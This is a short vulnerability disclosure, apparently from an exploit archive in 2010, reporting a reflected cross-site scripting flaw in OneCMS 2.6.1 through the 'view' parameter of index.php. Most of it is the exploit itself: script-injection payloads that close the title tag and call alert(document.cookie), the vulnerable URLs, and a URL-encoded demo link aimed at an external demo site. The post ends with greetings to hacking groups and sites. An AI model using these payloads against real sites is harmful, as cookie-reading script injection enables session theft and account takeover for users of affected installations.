OneCMS version 2.6.1 suffers from a cross site scripting vulnerability.
36f4fb5855939c1f7d8dc2edead0768a8d6a834a57f32aca98abfabad05b4a8b
#Script: OneCMS v 2.6.1
#Date: 3-09-2010
#Discovered By: anT!-Tr0J4n
#My Home : www.Dev-PoinT.com
#Email : C1EH@hotmail.com & D3V-POinT@hotmaiL.com
#Software Link:http://sourceforge.net/projects/onecms/files/v2.6.1/OneCMS_v2.6.1.zip/download
#Tested on: Win7/Linux
------------------------------
-[ExploiT]-
http://127.0.0.1/OneCMS/index.php?load=elite&view=[ XSS ]
http://localhost/OneCMS/index.php?load=elite&view=[ XSS ]
</title><script>alert("anT!-Tr0J4n")</script>
</title><script>alert(document.cookie)</script>
# d3mo
http://www.insanevisions.com/onecms/demo/index.php?load=elite&view=1%3C/title%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
-------------------Special Thx---------------------------
GlaDiatOr/SILVER STAR/Coffin Of Evil/HoBeeZ/Nashy/Mr.Mh$TEr /Own3d /Cyber-Err0r /zoz
" Dev-P0inT.com " inj3ct0r.com " hack0wn.com " exploit-db.com "